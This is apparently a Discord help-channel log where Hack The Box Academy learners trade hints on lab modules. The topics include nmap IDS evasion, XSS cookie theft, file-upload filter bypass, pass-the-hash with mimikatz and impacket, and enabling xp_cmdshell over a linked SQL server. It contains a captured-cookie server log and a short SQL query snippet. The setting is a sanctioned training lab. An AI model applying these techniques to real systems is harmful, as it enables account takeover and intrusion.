I don't I pay for the student plan as I think it's the best deal

haha yea its obv the best deal

I'm not sure if you can "triple stack" subscriptions you'd have to ask someone else about that. You'd get 1000 cubes with that plan and unlimited Pwnbox time which I think should last you the month for working towards the CBBH or CPTS

and then it renews the next month and you'll get another 1000 cubes

yea ill figure it out, have a bunch of time atm so might just have to purchase some cubes to get it done

yeah thats almost certainly it, youre not eligible for student sub anymore and it expired. Gotta pick a new one or buy some cubes

Yea what I figured just gonna keep moving forward

Just confused me for a bit lol

huh it shows you prices in USD? all my pricing is in euro

support told me they couldnt do anything about it lol

Rip lol

ive had very glitchy experience wit hacademy subscriptions too. Glitched out the user interface by switching to university email subscribing to student plan then switching back to regular email. didnt like that at all.

Happy weekend!

Thanks, you too!

is anyone available for Shells & Payloads Host2? I feel like I'm missing something so small

I might be able to help

I'll send a dm I'm going to still need help on the above if anyone has completed the module.

@vital adder I sent you my req file and my cmds I used

quick question do you still need to do the openvpn stuff if on attackbox

If your using the pwnbox you dont have to connect to the VPN. If that is what your asking?

Its been awhile. since I did that one.... do you still need help with it?

k

no you do not my friend

Module: Web-Proxies
Problem: I did it correctly but the cookie get replaced with the default cookie instead of the payload one

Hello everyone! Someone could give me some hints on how to use a exploitdb module on metasploit 😦

@rustic sage dm me

Thanks, you too! & Where could I join in this page?

how can i connect to user forend? the module is Bleeding Edge Vulnerabilities from Active Directory Enumeration & Attacks

Hey folks. I'm at the end of this module (https://academy.hackthebox.com/module/19/section/119), but I need help getting the proper NMAP commands to make it past the IDS/IPS. I've tried a whole host of different combinations to no avail for the past couple of hours. Can anyone point me in the right direction?

you need to add ||3dac93b8cd250aa8c1a36fffc79a17a|| as a Prefix

try some of the stuff show in the ||Firewall and IDS/IPS Evasion|| section

@vital adder That's what I've been trying. ||Switching between Syn/Ack scans, changing the source port, using decoys, changing the timing profiles, etc.|| I haven't had any luck.

hint use the ||source port|| show in the example

i did not working

also it look like you did got the flag in your previous screenshot

the 1248 length in this section is with the flag

lemme check

oh wait those cookie look right and putting the other thing as a Prefix just basically put it in front of the payload but if you do manually you don't need to add Prefix again so should already got the flag in this screenshot

What’s wrong with my command?

the problem is it automatically replaces the cookie with the guest cookie instead of uploading the payload cookies

i got it

ty

can i dm you if you dont mind?

sure

Any?

Got it

Hi! Not sure if this is the right place. But it is possible to change the dark font for light font in the Hack The Box Academy.

i dont think so but you can use additional extensions to do that

Thank you!

Anyone for help at PTT attack ? At passwords attack module question 8

Hello guys, i'm new to HTB can someone explain to me how do i get the root flag ?

oh no , i think this is kind of advanced for me

HI , I AM PRI ..I AM JUST A BEGINNER AND I DO NOT KNOW WHERE TO START FROM ...PLS HELP ME AND GUIDE ME ..
THANKS

how beginner are u, cause i am also but i know how to use the command line

I AM LIKE I KNOW CODINGS AND ALL

i just figured out that i need to learn first at HTB academy

I JUST HAVE THE HACKING INTREST SO I REALLY WANT TO LEARN IT

HTB ?

ACADEMY?

LIKE HERE IN THE SERVER ?

cause in the HTB it self it will ask u to get flags through priviliage escalation and those stuff

oh so ur new to linux?

YEA

TOO NEW

can u dm me ?

OKAY

@sturdy heath if you guys are new to this give both of this video a check too see what you can and should learn first
https://www.youtube.com/watch?v=0vu_Hs4N8B8
https://www.youtube.com/watch?v=lhz0-qAQlBM

I finished my path!

The basic tools are so easy to understand now I've trudged through all the theory

to get the root flag basically mean you need to hack and get the highest private user (root) of a box but this channel is for htb academy

sure shoot me a dm if you still need help with that

THANKS

I could still use some help on Shells & Payloads Host2 if anyone remembers it

sure what's the issue?

Hi there people in the Blacklist Filters section of the File Uploads module, i've been trying to execute the php code, but it gets written as HTML on the page, any tips?

Even using a dedicated php list, all the ones who pass the blacklist filter don't execute code

I'll dm if that's okay? Don't want to spoil the challenge

hint try a different extension

sure

hey guys, anyone here at Attacking Authentication Mechanisms module?

got stuck at skills assessment

I`m with that one too!

what are you stuck with?!

already solved it

I get an error while runnin the exploit!! got a unexpected json response before getting the shell!

it`s the last step I guess 😦

You can dm me if you're stuck

Thanks man

Good evening!

hey guys

i need some help

with what module?!

Can I get a pointer to this? It's being super slow for me

@languid dawn uhh this link looks sketchy

This link seems to be broken already 🙂

Sweet

Possibly CheckShortURL is blocked.

yep any run can run it just fine but it look like just some social media spam stuff https://app.any.run/tasks/100fee6c-3afb-45d7-9dfb-c4119e43a5d1/

Is there wireless hacking or any form of WIFI module on Academy ?
I've tried searching, couldn't find it, perhaps it's named something else. Thanks.

No, currently there are no modules about WiFi hacking

++ Thanks.

on the AD enum module, from the attack box (via rdesktop in kali) fping only returning 3 IPs, also, can't clone kerbrute. anyone else have that issue?

pretty sure most of the sections only have 3 hosts up

thx, instructions indicate 9

damn I dont remember any of em having 9, weird

I remember one of the sections I had better luck with the native ping and just bash looping it, maybe that's the one youre on.

just cause theres that many alive in the section notes doesnt means it always matches with the assessment

yep, dns is also messed up, can't resolve anything, so i can't clone kerbrute

git

kerbrute should be preinstalled

and yeah the target machines dont have external internet access, you cant download anything from the provided attack boxes unless its the pwnbox itself

LOL, 🤦‍♂️ it is installed, THANKS!

Is there like a general chat here?

#general

I acc can’t open it

Or see it

verify your account

anyone have a nudge on grabbing the admin for the footprinting IMAP/POP3... I have all other answers but cant seem to figure out what I'm missing here.

i don't know if this is the right method but if you found the admin username just add the target domain at the end

I thought I did, but must not be correct

Ah.

oh that was fast but congratz

Yeah I found it earlier... there was one word to many in the part that mattered to not spoil to much. lol

Hello, could someone help me please? I'm at Web Attacks - Skills Assessment. I found the admin user. I want to change the password. However, I get back|| "Missing parameters" from Burp Suite. I added all the parameters (3) sent to the resetPassword() function on the /settings.php page in /reset.php.|| Thanks for the help in advance.

Question on the nmap module for the medium IDS/Firewall section. This question: "After the configurations are transferred to the system, our client wants to know if it is possible to find out our target's DNS server version. Submit the DNS server version of the target as the answer. " Are they asking for BIND version or the OS version of the whole box?

I've also tried the service version on port 53 but to no avail

hint you only need ||2|| value for ||2|| parameters and the second you mentioned is the right one not ||setting||

hint ||protocol||

ok thanks, but how do you know which parameters are the correct ones?

hint all of them

👍

but that's three, isn't it? ||body: uid=${$.cookie("uid")}&token=${json['token']}&password=${$("#new_password").val()}||

i forgot the password parameters but i don't count as needing a "right value" from the target web server (also that's a bit too much spoiler even with the spoiler tag )

i mean remove parameters (too much spoiler) not the spoiler tag

I understand thanks for the hint 👍

All, I am having issues with defacing the website in the Cross-Site-Scripting (XSS) - Phishing Module, I am able to create the username and password field with using a payload appended with the html code but when I try to remove the image field like it says it doesn't remove it

hint for that you don't need to remove the image field

In the clean up part?

yep

ok thanks

hello

May I get a nudge with Shells and Payloads “The live engagement” host 3? I attempted the obvious exploit mentioned in the hints. Nothing. Attempted uploading asp webshell. Certutil is downloaded onto the machine but can’t transfer over files/shell into the default directory path. I’ve been stuck for longer than I car to say. 😔

i use the obvious one and it only work like half of the time for me so if it doesn't work for you use the same exploit, but module that only run 1 command at the time and you only need to run it twice for the flag

aslo off topic but anyone know which debian version i should use for parrot os 5.1.2 (not the htb version btw) on vmware?

May I dm you about the obvious exploit to ensure I am barking up the right tree?

sure

whats a quick way to enumerate where you have write access to on windows computer?

Okay so I'm doing XSS - Session Hijacking or w/e and I've grabbed the admins cookie and I'm unsure of what I might have done wrong or why what I have gotten is not correct.
|||[Sat Dec 3 18:58:29 2022] PHP 8.1.13 Development Server (http://0.0.0.0:80) started
[Sat Dec 3 18:58:47 2022] 10.129.47.138:51404 Accepted
[Sat Dec 3 18:58:47 2022] PHP Warning: Undefined array key "0.0.0.0" in /tmp/tmpserver/login.php on line 7
[Sat Dec 3 18:58:47 2022] 10.129.47.138:51404 [200]: GET /login.php?c=cookie=c00k1355h0u1d8353cu23d
[Sat Dec 3 18:58:47 2022] 10.129.47.138:51404 Closing|||

I'm having a small misunderstanding on how to grab the flag from login.php? Plz help ty love all of you ❤️

man, ive gotten so far on this web attacks module (skills assessment) without looking at anything and now im stuck...anyone got a hint? im logged in as admin looking at events page

@vital adder Have you done the AD enumeration module yet?

about to but still nope

darn the skills assessments are tough as nails

trying to figure out how to PE from a xp_cmdshell

i don't have the admin cookie save in my note (for some reason) but if that's the admin cookie in /login/ you can add a new cookie and named it "cookie" with that value (also if that's the admin cookie pls remove it here)

so are you having issue finding or exploiting the vuln?

imo that was one of the stickiest points of the assessment

I think I found an ipsec video with the way to do it

exploiting the vuln

will let you know in 10 lol

shoot me a dm on what you are trying to exploiting i don't remember anything about finding the doctype

@thorn urchin I got it, i'll dm you how if your interested. Got NT system authority

sure, I used a cheesey easy way, curious what your way was

Is it possible to do a pth attack from a rev shell?

nvm I have another idea

to answer anyways, depends on the shell and the scenario.

how do you do a local login for rdp I've tried ./

I made a local user and want to see if I can login to my new user, then use mimi to pth to the other workstation

found the flag! thanks

anyone able to provide assistance with Attacking Common Services - Hard?

I am trying to interact with the sql linked server and enable XP_CMDSHELL and then possibly read the flag but im not sure on the command syntax and how it needs to be formatted?

I think xfreerdp defaults to local login unless you specify a domain, otherwise idk

Same, but it was failing. I'm guessing it didn't take my command. No way to tell since the reverse shell doesn't spit out error output

xp_cmdshell <cmd>

dunno, I dont think I used rdp once in the assessment

I used it on MS01 I dont think I ever got anything useful out of it when I think about it

I was able to steal some usless ntlm hashes

my notes got a little fuzzy around there as I got excited and blitzed towards the end. I remember generally what I did, but I dont remember what host was which lol

you finished attacking common services module? but not that simple gotta run something like

EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]

that must be nice as Im not making any progress lol

I can get mimikats to run pth but I cant get output from it

well remember it doesnt necessarily matter where you run pth from, so long as you have the relevant hash

I have the administrator hash

but I cant do a pth on m01 as mimi wont work properly

on sq01 it runs but my rev shell wont let me pass input to the new shell

just do it from your attack host

you can run mimikatz from linux?

almost every impacket tool will accept ntlm hashes for pth variant of whatever they do

hmm let me look up more impacket tools

at the very least itll get you a more sane shell if youre at where I think you are

Looked back at my notes, your syntax is almost there, the end of it should point back to the db your working with

I just straight up brute forced that module, it kinda felt like crap

could I dm you about it? I think I need to enable xp_cmdshell then run a dir command to read the flag but have no idea how to format the command using this Execute(function) keep getting syntax errors

sure

weird I cant initiate a dm with you. Its not allowing me could you try dming me?

getting this error message when I try

Your message could not be delivered. This is usually because you don't share a server with the recipient or the recipient is only accepting direct messages from friends. You can see the full list of reasons here: https://support.discord.com/hc/en-us/articles/360060145013

Thanks got the flag.

Been working on this XSS Session Hijacking session for about 4 hours now. If anyone is willing I'd love a nice ELI5. I've confirmed vulnerable blind xss parameter, I've hosted teh script on local server I'm hosting and I have not been able to reach out and grab the cookie from the admin user. I'm very close but need a bit of ELI5 help as I'm definitely missing something

I somehow got the cookie 1 time but I am not able to repeat and its obvious I'm lacking some understanding and would love some help ty ❤️

could sb help me with first question here? https://academy.hackthebox.com/module/81/section/787

Enumerate the target and find a vHost that contains flag No. 3. Submit the flag value as your answer (in the format HTB{DATA}).

anyone knows how to fix that? module: Information Gathering - Web Edition

i got the first 2 flags

Need help with the Skills Assessment part of Using Web Proxies for the question 3 :
Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)
I tried to fuzzle the answer by prefixing the 31 characters long decoded cookie and then encoding it 2 times, but I can't get it to work

So you fuzzed the prefix. That didn't work.
What happens when you fuzz after 31~

I added the list of possible characters, then added as payloads the prefix of 31 characters and the 2 encryptions in that order, which gave me a string of 88 characters as indicated in the hint. However all the responses I get are the same length. Did I miss something ?

Did you try with curl?

If so dm to share your command

And see what we can do

i did and also dm'd you

Hello What Identify the username of the user that has a position of 736373 through SQLi. Submit it as your answer. I change script for range() function to work from 376370-376380 with step 1 but do not show any result. 🙂

Can I get some help on enumeration? I'm struggling to understand the IDS/IPS Evasion and could use some aid in how to get a System OS from filtered ports.

Network Enumeration -> Firewall and IDS/IPS Evasion - Easy Lab

I have read through the module a few times, but I think I'm just ticking over in the head a bit maybe ^^;

the nmap thing right?

Yep

i think the solution was under the mentioned "Used Scanning Options" u should use the source port thing and an ack scan i think but its a long time ago im not sure

Oh yeah I know- but I was more looking to see if anyone had the time to explain it further to me

what exactly?

Well I wanted to understand how the DNS Proxying actually works

On a logical level

Like how come it works whilst using Fragmentation and Timing doesn't when you're trying to find Information ?

in the first case nmap calls another dns server that is more trusted in the second nmap pretends to be a dns server by using port 53 as source port..

i need help with AD Enumeration & Attacks - Skills Assessment Part II

Hi, my name is Sarah and I was wondering if anyone could help me out with solving the question in the one before last section ("Shellcoding Tools") of "Intro To Assembly Language".
I'm extremely stuck there, have been pretty much trying for a couple of hours and still cant find the right way to solve it. I'd appreciate anything, especially if one could guide me to the solution (in case of voice call, ill be available in 2 hours from now), and even just the answer itself might help get me on the correct track.
thank you! ❤️

im at the "skills assesment-service login" of "login brute forcing" can someone give me a hint how to build the personalized wordlist i tried a lot already..

@strange aspen ?

that question or the previous one

As you now have the name of an employee, try to gather basic information about them, and generate a custom password wordlist that meets the password policy. Also use 'usernameGenerator' to generate potential usernames for the employee. Finally, try to brute force the SSH server shown above to get the flag.

the number 736373 doesnt exist between 376370 and 376380

@strange aspen

didnt take notes of that module sorry

np

@thorn urchin Sorry, got the id wrong. in the script i iterate over the range (736370-736380 ) with step 1:)

Sir

You can watch this video

Let me get it

https://youtu.be/j_3dh_W_aas

Thanksthanks

@strange aspen still need help?

y

go dm

Hello!
For questions - AD Enumeration & Attacks - Skills Assessment Part II
I have only two steps left to take.
Logining to DC01, taking the flag and get the NTLM hash for the KRBTGT account.
But I can't figure out how to get to DC01.
On the MS01 machine, I am a full-fledged administrator.
How to move to DC01 with her?
Maybe you need to add a user on DC01 to the "Remote Management Users" group, but how?🤔

Hello, I'm at Web Attacks - Skills Assessment. I found the admin user and tried to change the password. But I get the message Access Denied. I tried to change the cookie UID to ||52|| in the browser. It says I'm the admin user but I don't have any advanced options. Do I still have to change the password?

hint ||read the HTTP Verb Tampering section||

thank you 🙂

@undone cypress can i dm you?

surely

Having issues with getting past a tcp wrapped service in Enumeration, I've used NMAP and NCAT but NCAT just time out on me- can anyone point me in the right direction?

Which module?

Enumeration-> Avoiding IPS/IDS Hard Lab

try connecting to that service using nc

And, don't forget changing the source port.

I've been using NC and it's timing out- is that an issue with what I'm doing or an issue with my internet-

What is the source port that you are instructing nc to use when attempting to connect?

50000

Which is the tcpwrapped service I'm trying to get the version and name of

That is the destination port, not the source port...

Ah sorry, source port is 53

Set the source address to your IP and you should be good to go

Roger, Roger!

Thanks ^^

How about changing the password for the domain admin then connecting using wmiexec.py?

Question 11 or?

You crack the hash in there

Inveigh.ps1?

Couldn't find the hash in memory

Wasn't roastable

Still just getting timeouts ^^;

Did you run lazagne.exe

DM me

I can't remember if I did or not. If that was the answer, then I feel like I should have figured it out.

but I feel like I remember that the CT*** user had no persistence, so that doesn't seem right.

In question 8, how did you escalate privileges?

Can I DM you?

Sure

@thorn urchin Finally finished it, wow what a "assessment" that was a full on box lol

but no matter which method I use, I always get the message "Access Denied" or "Missing parameters".

Did you update the URL parameters, if you went with GET?

I changed the uid, token and cookie uid

But are they sent with the query string or?

If they are still sent within the request body it won't work

congrats

Delete your message as this spoils the question.

DM me I will help you.

Hi guys, I'm having problems in the File Upload Attacks Module - Whitelist Filters exercise. I am able to upload the file but I keep getting"Not Found" responses when browsing to it's address in ||/profile_images||

A helping hand would be great, thanks

theres a couple of false positives when uploading

if its one of the \x00 in the extension name itll pass but its no good

I've tried various

/ , .\ , :

did you try the bash script wordlist generator they give you?

I tried using the extensions

did you use the generator script from the lesson

Disabled URL-encoding option in Burp?

this is why name like may not work (i'm too lazy to type this again) #modules message

I don't understand, why teach something if it's not going to work?

it does work, youre misunderstanding

Yeah, I'm confused

there are some variations that will work, and some that dont depending on the situation

now again

yes or no

not all special character or the thing with % can be url encoded so some of them will work

did you use the bash script they give you to generate a wordlist?

Yeah

okay good

now use it, and add a couple more valid php extensions 🙂

Thanks, I will now try it 😄

i try to do the first question of Meterpreter Tunneling & Port Forwarding but i only have 1 IP in return or 0

Please can anyone here help me track a stolen phone 📱🙏🙏🙏am still new please 🙏